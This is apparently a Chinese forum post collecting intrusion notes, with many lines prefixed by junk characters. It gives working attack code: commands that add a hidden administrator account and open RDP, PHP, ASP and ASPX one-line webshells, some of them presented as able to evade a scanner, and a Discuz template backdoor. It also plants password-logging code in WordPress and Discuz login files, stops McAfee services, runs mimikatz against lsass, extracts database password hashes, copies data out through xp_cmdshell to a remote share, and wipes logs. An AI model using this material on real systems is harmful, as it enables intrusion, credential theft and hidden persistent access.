0 r2 Z! G0 d% E) W修改3389端口方法（修改后不易被扫出）
修改服务器端的端口设置,注册表有2个地方需要修改
+ _0 D. A3 Y& }& X' U, b# s
& {) B7 B6 R; _, L1 @[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
9 A; C- R+ q+ J9 a/ g5 N$ M7 kPortNumber值，默认是3389，修改成所希望的端口，比如6000

第二个地方：
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]　
, X# ^  v5 C' ^9 |! H, _+ t4 B3 e; NPortNumber值，默认是3389，修改成所希望的端口，比如6000

现在这样就可以了。重启系统就可以了
! `- _7 }5 G: O7 Q1 P
1 h2 J' b" o% y) {( F7 t" r查看3389远程登录的脚本
' l2 C: Q6 m: _# N7 K, o7 ]! W保存为一个bat文件
, ]; Z- O$ A3 I# |$ r; G2 Zdate /t >>D:\sec\TSlog\ts.log
! ?' m' g" H, A7 J) k1 \/ y/ Wtime /t >>D:\sec\TSlog\ts.log
+ a  q* {* {( v! N" m7 w6 anetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
: u; b; J! G$ }" p' z: Y
mstsc的参数：
2 W( T% O: \* Q4 E3 Y) [
9 `% c  Y$ {8 W8 {, {1 w7 U) x( o远程桌面连接

# J6 g! l4 x, ~9 y: z$ m, bMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
. R1 Z7 Z& k. O6 Q( G% B  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

6 p9 ~( q0 z1 w+ p; U+ y! r<Connection File> -- 指定连接的 .rdp 文件的名称。
- h1 J9 o1 f+ J, C. W* a
8 ^( ?+ ]9 C0 \/v:<server[:port]> -- 指定要连接到的终端服务器。

) v$ |' l" R1 Y5 ?- p/console -- 连接到服务器的控制台会话。

- M# V% T" ~5 _! T, w/f -- 以全屏模式启动客户端。
+ n% h$ c+ E' m. B* Y
3 ]: B( C. ~4 z: F6 K+ I/w:<width> --  指定远程桌面屏幕的宽度。
/ j( }7 e& T9 _4 h
3 }2 e, f5 l' f  p( n/h:<height> -- 指定远程桌面屏幕的高度。
9 \# s/ }" E0 L
# Q- g3 T1 ~6 q0 p/edit -- 打开指定的 .rdp 文件来编辑。

/migrate -- 将客户端连接管理器创建的旧版
% \+ q- m1 K0 M8 d: [* F- b连接文件迁移到新的 .rdp 连接文件。
9 W! @4 n2 m9 ~/ D) s

其中mstsc /console连接的是session 0，而mstsc是另外打开一个虚拟的session，这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊，有的时候用得着的，特别是一些软件就
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
9 Q# q) \" B3 ?  b
) u$ P1 o: u* O0 W命令行下开启3389
net user asp.net aspnet /add
$ K0 X  @. h: S$ z$ C. m3 U1 ?3 \net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
# K  z% W4 p7 N7 O. N" C& Cecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
/ ^3 |  D4 @& o8 ?$ K& Csc config remoteaccess start= auto
net start rasman
7 V" o2 u7 q5 K: m- qnet start remoteaccess
" ]9 g2 n# J, a$ v& w% uMedia
4 K% H$ ~% D! a5 }. Q- J, m' ?<form id="frmUpload" enctype="multipart/form-data"
# g  S! \4 U+ g9 _, b/ J/ J$ Daction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
( V  g$ ^- [: \( w3 R, @<input id="btnUpload" type="submit" value="Upload">
</form>
, A+ L: m1 r9 h& b' B
# d9 ^1 h: D' i# Z! V0 Y  Scontrol userpasswords2 查看用户的密码
access数据库直接导出为shell，前提a表在access中存在。知道网站的真实路径
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
2 c; f% a3 s# J9 S, m, A6 a4 i
141、平时手工MSSQL注入的时候如果不能反弹写入，那么大多数都是把记录一条一条读出来，这样太累了，这里给出1条语句能读出所有数据:
测试1：
  {& W6 R# k! h# D1 u$ A, ]SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

* l7 m7 e; e: ~0 Z, c7 K2 B3 @1 q测试2：

! a7 J5 L: t/ q! }create table dirs(paths varchar(100),paths1 varchar(100), id int)
, J* G( X) R1 P2 `: g
( l3 ]# o9 H6 n2 e7 _8 \, Z' `delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

5 S& G1 V$ Z0 a' |& I0 f$ \4 fSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
关闭macfee软件的方法：//需要system权限，请使用at或psexec –s cmd.exe命令
* ^2 t! A  E0 Q5 c8 @  N可以上传.com类型的文件，如nc.com来绕过macfee可执行限制；
net stop mcafeeframework
net stop mcshield
6 p: o' R8 q2 H/ j( snet stop mcafeeengineservice
. S1 s# m1 {: [" Gnet stop mctaskmanager
; b. [  r( A: L$ whttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

' Z  x6 [4 S" d  VNCDump.zip (4.76 KB, 下载次数: 1)
密码在线破解http://tools88.com/safe/vnc.php
VNC密码可以通过vncdump 直接获取，通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取

exec master..xp_cmdshell 'net user'
" E' |8 k0 q) y, p' C" i7 w$ Wmssql执行命令。
. t, B% [" r3 L' _- q* o1 T获取mssql的密码hash查询
select name,password from master.dbo.sysxlogins

% G& Q, H' t/ k6 @8 ]1 Obackup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
. A( J1 j/ t. |9 amssql数据库压缩

" @+ p1 f' n, h  j. N9 y- @% URar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
8 F/ A& j2 z. \6 @6 k) {  K将game_db_201107170400.BAK文件压缩为1.rar，大小为200M的分卷文件。

; i( J. g/ L. O) F# M* Abackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
3 Q# ]' i; ]* T* Q备份game数据库为game.bak，路径为D:\WebSites\game.com\UpFileList\game.bak
1 L* B) |9 v! S! B/ p: v4 ]
Discuz！nt35渗透要点：
（1）访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
, W; q' q4 `9 l（2）打开rss.aspx文件，将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份，然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
（3）保存。
1 ~2 Q2 N# j/ G0 Y（4）一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
2 J5 [- `- O7 jd:\rar.exe a -r d:\1.rar d:\website\
递归压缩website
注意rar.exe的路径
, o0 I3 k6 R; b" [; o' b4 |6 |
8 p5 o9 A! X7 y) U<?php

' D* J1 I9 v! n9 t$telok   = "0${@eval($_POST[xxoo])}";

$username   = "123456";
! K: i$ T2 m5 E. [2 s3 Q; X
$userpwd   = "123456";
1 P1 l' n/ N; Q
% |+ M3 h- a3 w$telhao   = "123456";

  J6 [) B; m1 g3 Q0 u$telinfo   = "123456";
; a% Z* H" e& }" E$ @/ e
/ T# x% @& A% N% X1 q# W. O?>
php一句话未过滤插入一句话木马

站库分离脱裤技巧
7 U. \- r  ^: G4 z& x4 J. k4 [% Xexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
( b& j+ Z7 v( L. N7 Q0 m! A+ V% u  {条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。
  R: v/ V. T/ R; M3 x3 O9 I" p这儿利用的是马儿的专家模式（自己写代码）。
% l" a4 ~1 n! g3 O) Y' }  Aini_set('display_errors', 1);
0 e+ N- h3 z0 p7 t) ?5 Uset_time_limit(0);
. E% ~% r) Z; O' k4 [3 J7 ^6 Terror_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
+ o) P0 x- {2 E2 kmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
  m8 `. H1 w5 C% K5 e8 T$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
* q, G8 ~/ H& I- X& `; o$i = 0;
/ d8 y8 [1 T% m* _; l, z& ?4 _$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
/ \; A& r+ u3 c9 y0 e    $i = $i+1;
    $tmp .=  implode("::", $row)."\n";
    if(!($i%500)){//500条写入一个文件
, r; f& Y3 ^# ?* l5 E- M; q        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
+ p3 ~2 N2 [  C7 d. b/ ]        file_put_contents($filename,$tmp);
        $tmp = '';
( `5 p* h! u; \) _    }
}
mysql_free_result($result);

5 X0 q! o5 O/ h4 I& [, m5 M1 D- F

: c# y1 x9 ?$ k: R- ^6 B; ~# q//down完后delete
3 @0 F1 b2 T/ i8 }1 F- P
* N" [/ `: B/ X, D. H  a4 e
/ s, R8 f$ o" O2 i; P3 M, n# Xini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
6 n! J8 M4 t$ H3 _( N$ _9 ^. Vwhile($i<32) {
$ f& A$ Q' ^- a    $i = $i+1;
( ]% _  `% Y+ G3 B( [5 }        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
        unlink($filename);
' l, x( J% q" X: h}
httprint 收集操作系统指纹
2 i% {+ r. W$ M" i4 P0 E扫描192.168.1.100的所有端口
& Y; s6 m# m% ]# vnmap –PN –sT –sV –p0-65535 192.168.1.100
% k% c  @, A! O; L4 b6 I/ Bhost -t ns www.owasp.org 识别的名称服务器，获取dns信息
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
5 f/ @, `' |; k$ ?! Y. a# ^$ ZNetcraft的DNS搜索服务，地址http://searchdns.netcraft.com/?host

; t! J( p  A- L5 a+ MDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)

2 f+ B$ {0 n' t　　MSN search: http://search.msn.com 语法： "ip:x.x.x.x" (没有引号)
6 L5 p# R0 B6 s6 S  Q0 q
　　Webhosting info: http://whois.webhosting.info/ 语法： http://whois.webhosting.info/x.x.x.x
( {/ T. M# m$ t3 i6 d
! P! G- x- S$ x- w1 h　　DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)

　　http://net-square.com/msnpawn/index.shtml (要求安装)

9 M8 W6 s0 |! G) C- C* G　　tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)

. z  c- P7 B& D( V; s6 M　　SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
set names gb2312
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。

( @! A! d  Z9 umysql 密码修改
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
, K) f/ W9 w2 h; B, g* h1 _! J9 vupdate user set password=PASSWORD('antian365.com') where user='root';
, o5 S# W; l2 q* {. jflush privileges;
高级的PHP一句话木马后门

  J# c4 U+ A2 c+ r0 W! R入侵过程发现很多高级的PHP一句话木马。记录下来，以后可以根据关键字查杀
' A# x/ d1 h, M3 i, a/ k# l. H
$ v( p7 O: N3 e; Y, y) x- @2 W8 |4 |1、
! r2 q  Z$ @$ {1 l, @9 q
& Y8 @9 b0 b* r9 l$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");
( g& f8 u' F. ?+ q1 R; T" Q# @
//菜刀一句话

2、
* r+ M; ^& o( o- R& y
9 i4 u7 `% F& W$filename=$_GET['xbid'];
2 f; }* `7 a% O2 x; P0 z
include ($filename);
7 N  E, D8 g; y" F8 s% u2 q
) t( a6 W' w1 p0 ?//危险的include函数，直接编译任何文件为php格式运行

  v  l8 }7 o2 z! E3、
. E0 N/ L: ^3 x" Y5 J8 U1 w
9 G* d  i# _( f  O$reg="c"."o"."p"."y";
* d" F# g) N: I" o4 D
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
7 z3 H2 }+ v. @8 i+ l( ~1 [! U' X( S: y
5 j4 V* U/ G+ @9 E7 }//重命名任何文件
+ }; m& ]4 X! q# [9 h
$ K* }; `; T  Q) Z) d& f4、
/ x; e* t2 d, ~/ ]6 i# C8 V) i
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
( N& k# @( _2 p+ U& M( e
0 l, q  q- L3 E# g( f; Z" a( w$gzid("/[discuz]/e",$_POST['h'],"Access");

& H7 V6 A" y1 ^- s# O) ^2 c//菜刀一句话
# i* E* }2 T9 L1 x; ]
- Z& e, a, m0 F( ]5、include ($uid);

//危险的include函数，直接编译任何文件为php格式运行，POST

- F1 h2 a% K6 Y& f
//gif插一句话

6、典型一句话

1 M" X* B( y. C程序后门代码
<?php eval_r($_POST[sb])?>
1 ~# N0 R5 j; q1 n" {程序代码
' Q! i. I5 Y% {* v3 Y<?php @eval_r($_POST[sb])?>
, A2 S$ B* L  q, F! B% N//容错代码
3 B/ X' m8 f1 F5 Q4 }4 }5 T! l) K程序代码
$ B+ I% x1 j6 Y  T1 K4 X<?php assert($_POST[sb]);?>
2 @0 k, C' P0 e+ r//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>
程序代码
8 L$ ~, r. G9 i4 l6 O<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代码
<?php
- P- o# T4 ^$ Y3 C, D. _@preg_replace("/[email]/e",$_POST['h'],"error");
( X2 l6 B$ g( J! p/ i1 O. w?>
" [: f! l$ d8 K" y1 i4 P" L//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
1 E# ]6 P% L: }3 n0 e# A5 ]程序代码
<O>h=@eval_r($_POST[c]);</O>
程序代码
<script language="php">@eval_r($_POST[sb])</script>
//绕过<?限制的一句话

) r/ @" w6 S4 v) L& Q, yhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
详细用法：
1、到tools目录。psexec \\127.0.0.1 cmd
2、执行mimikatz
3、执行 privilege::debug
8 Q. {, F/ x* w0 s1 [5 v* H4、执行 inject::process lsass.exe sekurlsa.dll
" j9 s7 E6 ^1 @; h) V5、执行@getLogonPasswords
5 d) g: E8 w( P% {# K& [6、widget就是密码
/ k4 I  K$ a9 P" @4 _3 \% `7、exit退出，不要直接关闭否则系统会崩溃。
+ p$ N7 v, ~& W# D( {
$ C6 j1 _6 q  D5 W4 C! {http://www.monyer.com/demo/monyerjs/ js解码网站比较全面

7 t* M" u8 M! E) z$ s# v  ~3 c2 ~自动查找系统高危补丁
& u# k1 n) k9 n$ a6 Osysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
# u+ f  ?  y2 m: u/ z8 d' B3 p% N
突破安全狗的一句话aspx后门
! J* ^2 C- {" B  K1 |4 P: k<%@ Page Language="C#" ValidateRequest="false" %>
2 @& W9 Q' }' b<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
! b) c4 i; b( C/ F8 X5 dwebshell下记录WordPress登陆密码
8 q, V/ m1 Z2 J. I; B  lwebshell下记录Wordpress登陆密码方便进一步社工
* g5 L- H9 T" F在文件wp-login.php中539行处添加：
. O; l. F; O/ W) J// log password
) I" X1 L! Z) n( A9 K5 V5 r$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
3 [% A: q  a% n0 c$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
. J0 {% a0 [& Z: A; l$txt=$txt.”\r\n”;
if($log_user&&$log_pwd&&$log_ip){
4 y* S. C3 ]+ P@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
7 }6 o& X) n  F! p}
; d" l, k1 \  e3 C8 I0 n: ~7 O当action=login的时候会触发记录密码code，当然了你也可以在switch…case..语句中的default中写该代码。
5 V) y* s5 q4 p( g# t就是搜索case ‘login’
在它下面直接插入即可，记录的密码生成在pwd.txt中，
4 b9 c1 E! [# E4 {. q其实修改wp-login.php不是个好办法。容易被发现，还有其他的方法的，做个记录
: Z; _* o6 d: Q! c利用II6文件解析漏洞绕过安全狗代码：
! |- a# I" X+ S( ^( n9 z;antian365.asp;antian365.jpg
" @1 y5 Y# Z, O+ R  s
各种类型数据库抓HASH破解最高权限密码！
1.sql server2000
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A

+ j4 V4 v. X* M9 }8 u0×0100- constant header
2 q! O: n: ?' B34767D5C- salt
# t/ Z" I( u0 v0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
: p( s$ w2 p+ H% D3 T; FSQL server 2005:-
5 t3 g7 Q* H, _) PSELECT password_hash FROM sys.sql_logins where name='sa'
' M& ]# [8 g$ F+ z0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
6 e) H0 C6 \  U2 c  t  ?5 V993BF231-salt
4 J: q, k) a- y1 V9 P! Z5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
% y& E* T! \* b$ X$ Ycrack case sensitive hash in cain, try brute force and dictionary based attacks.
$ u8 D5 W2 c7 g0 t& C6 W" K
update:- following bernardo’s comments:-
( w' O# J3 E* K6 d) Puse function fn_varbintohexstr() to cast password in a hex string.
3 U; a% w* M; M  V. }e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
& A0 b2 y7 l, G& a
5 @8 d5 m2 J; bMYSQL:-
$ f# I" O: t$ m3 M/ p% C
5 c/ _- I$ x4 f9 h4 ~; kIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
6 s$ S9 V" s/ V4 {. F8 m
& ?1 k9 y4 B: y; H9 }*mysql  < 4.1
- n1 N+ P- `- ^4 r
mysql> SELECT PASSWORD(‘mypass’);
, a8 T& ?+ R0 u7 e* K9 e! z+——————–+
| PASSWORD(‘mypass’) |
+——————–+
| 6f8c114b58f2ce9e   |
+——————–+
0 g8 r2 b; s9 w, g* E
*mysql >=4.1
1 V0 _, K" t5 E2 T2 a3 s1 O) _) X
& K# @# \# T; u. D* Z; imysql> SELECT PASSWORD(‘mypass’);
+——————————————-+
' {, ^! H) Z- h( @3 y* x4 b/ W| PASSWORD(‘mypass’)                        |
- L# D! b9 \, N1 d  B' [' Z7 p+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+

Select user, password from mysql.user
The hashes can be cracked in ‘cain and abel’

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
select usename, passwd from pg_shadow;
usename      |  passwd
——————+————————————-
6 R4 p7 U+ y* ^$ |9 h+ X- @: }. ctestuser            | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ _7 C' w3 D" v5 p2 o' @$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
/ ^+ W+ \; \& f3 O0 j4 _- v( B
Oracle:-
# J. f' k: Q* J. u5 J) Wselect name, password, spare4 from sys.user$
, D$ \5 c, u* [* U, ?) c6 ]hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….

. _$ Z2 M  @; T
6 V9 |; G' s& S& ?9 s在sql server2005/2008中开启xp_cmdshell
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
9 H3 Q7 k# \! mEXEC sp_configure 'xp_cmdshell', 1
; f* a2 M, z2 Q. L+ j5 IGO
-- To update the currently configured value for this feature.
' `% _5 s1 x8 ~) YRECONFIGURE
2 A; d' s3 E8 F  z; NGO
SQL 2008 server日志清除，在清楚前一定要备份。
0 p- H  w1 p$ G. V% k, s$ E如果Windows Server 2008 标准版安装SQL Express 2008，则在这里删除：
Ｘ:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
: S' J) g  ~2 O& S- P
8 b& z- J$ z% Q8 l对于SQL Server 2008以前的版本：
# X+ k0 ^9 k" w) R% ?3 gSQL Server 2005:
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。

. e" M2 F6 ^) U: F* k* N本帖最后由 simeon 于 2013-1-3 09:51 编辑

$ ~* B; L/ h4 Y# a" o
windows 2008 文件权限修改
. g+ V9 W5 k5 t1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
一、先在右键菜单里面看看有没有“管理员取得所有权”，没有“管理员取得所有权”，
( _- V! n0 O7 j
/ q5 Z7 }. x; k% RWindows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
8 d2 v8 T) z! T' C0 m9 q  X# z. p"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 g# g; A0 |7 W! }/ _  j( m[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
7 [6 I$ o! e7 |"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
9 m, Q4 j: {( _5 L9 h@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
( v) E/ x  M) J4 t"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
! p9 R: ~4 E3 v" U% I  g! ?@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
+ I* {2 B' H/ d1 `0 P* j! n; f@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"


win7右键“管理员取得所有权”.reg导入
7 p% u4 q! i( c二、在C:\Windows目录里下搜索“notepad.exe”文件，应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”，
1、C:\Windows这个路径的“notepad.exe”不需要替换
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
! H) R; E6 i+ x3 Z. V/ g3、四个“notepad.exe.mui”不要管
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
7 j' F& j' ?( C% s8 |  r替换方法先取得这两个文件夹的管理员权限，然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面，
$ d% q- f: Q% \) U) \3 m替换完之后回到桌面，新建一个txt文档打开看看是不是变了。
. {( i) M- y, s( p) Z, d( cwindows 2008中关闭安全策略：
: a# W6 l, w2 d. O7 w0 f8 Hreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
修改uc_client目录下的client.php 在
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
2 Y) x+ ^3 h4 q! |% B. n/ F$ s% m下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
9 ~1 S  ?1 F; d- ~- f7 A% `* X) q你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为：falw
- j! Y# k$ W0 ?, dif(getenv('HTTP_CLIENT_IP')) {
+ f& }* M2 D. z0 W$onlineip = getenv('HTTP_CLIENT_IP');
, t/ t/ ]3 [  X& I8 a} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
9 j; O5 o5 S5 r8 @3 W" E8 `; ]$onlineip = getenv('REMOTE_ADDR');
7 x* q5 f" @% h0 `} else {
- s0 U' D# D2 ^! E& u7 A$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
1 D' n5 D8 t  N3 W5 b     $showtime=date("Y-m-d H:i:s");
9 o. m. C5 |0 g0 |  E    $record="<?exit();?>用户：".$username." 密码：".$password." IP:".$onlineip." Time:".$showtime."\r\n";
    $handle=fopen('./data/cache/csslog.php','a+');
    $write=fwrite($handle,$record);